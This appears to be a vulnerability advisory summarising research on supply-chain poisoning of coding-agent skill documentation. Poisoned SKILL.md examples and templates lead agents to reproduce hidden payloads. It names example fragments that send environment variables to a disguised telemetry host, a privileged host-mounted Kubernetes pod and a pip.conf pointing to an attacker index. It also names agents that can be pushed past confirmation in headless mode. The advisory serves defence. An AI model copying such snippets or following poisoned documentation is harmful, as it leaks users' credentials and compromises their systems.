Agent Implicit Doc Execution
Research Paper
Supply-Chain Poisoning Attacks Against LLM Coding Agent Skill Ecosystems
View PaperDescription:
LLM-based coding agents are vulnerable to Document-Driven Implicit Payload Execution (DDIPE) via supply-chain poisoning of third-party agent skills. Attackers can embed malicious logic directly into legitimate-looking code examples and configuration templates within skill documentation files (e.g., SKILL.md). Because coding agents ingest this metadata into their context windows and treat the documentation as an authoritative reference, the underlying LLM silently reproduces and executes the embedded payload during routine task completion. This implicit execution bypasses both model-level safety alignment (which looks for imperative malicious instructions) and framework-level architectural guardrails, hijacking the agent's system-level action space (file I/O, shell commands, network requests) without requiring explicitly malicious user prompts.
Examples:
- Code Example Poisoning (Data Exfiltration): An attacker publishes a PDF-processing skill where the official
SKILL.mdcontains a Python example forprocess_pdf(file_path). The example includesenv_data = dict(os.environ)and a disguised telemetry requestreq("https://api.internal-log.com", data=env_data)wrapped in atry/except: passblock. When the agent uses the skill, it copies the reference implementation, silently exfiltrating host credentials. - Config Template Poisoning (Privilege Escalation): A skill documenting Kubernetes pod creation includes a YAML template with
securityContext: privileged: trueandvolumeMounts: - name: host-root, mountPath: /host. When the agent is tasked with creating a pod, it applies the backdoored configuration verbatim, granting unauthorized host access. - Sandbox Semantic Bypass (Infrastructure Poisoning): An adversarial skill embeds a 479-byte pip configuration script that writes an
extra-index-urlpointing to an attacker-controlled repository into the workspacepip.conf. The agent reproduces this file, which bypasses standard path sandboxing sincepip.confis a legitimate workspace artifact, silently poisoning all subsequent package installations.
Impact: Successful exploitation allows an external attacker to achieve system control, Remote Code Execution (RCE), and persistent infrastructure compromise. Specifically, the vulnerability enables unauthorized read/write file operations, silent exfiltration of environment variables and configuration secrets, and the generation of backdoored Infrastructure-as-Code (IaC) files (e.g., tampered package manager configs, Ansible playbooks) that can propagate to production via automated CI/CD pipelines.
Affected Systems: LLM-based coding agents that retrieve and execute third-party agent skills or rely on repository-provided documentation for tool-invocation workflows. Confirmed vulnerable systems include:
- Claude Code
- OpenHands
- Codex CLI
- Gemini CLI (specifically amplified in headless/CI environments where the
-pflag, non-TTY stdin, orCI=truebypasses execution confirmation).
Mitigation Steps:
- Prompt-Level Trust Boundaries: Inject mandatory security warnings into the agent's system message template explicitly marking all retrieved skill documentation and repository-provided content as untrusted (e.g., deployed in OpenHands PR #2XX5).
- Semantic Permission Scoping: Disable default auto-trust of workspace folders in headless or CI/CD modes. Require strict, intent-based confirmation prompts for specific high-risk system interfaces (
run_shell_command,write_file) when triggered by logic derived from external skills. - Multi-Model Verification: Deploy heterogeneous models for execution-decision ensemble voting. (Research demonstrates that single-model execution rates of up to 27.1% drop to a 1.6% joint-bypass rate across diverse LLMs due to model-specific alignment blind spots).
- Intent-Level Semantic Auditing: Do not rely solely on syntactic sandbox boundaries (e.g., filesystem paths) or lexical keyword filters. Implement strict configuration anomaly scanning (e.g., detecting unauthorized registry URLs in generated
pip.conffiles) before permitting action-space execution.
© 2026 Promptfoo. All rights reserved.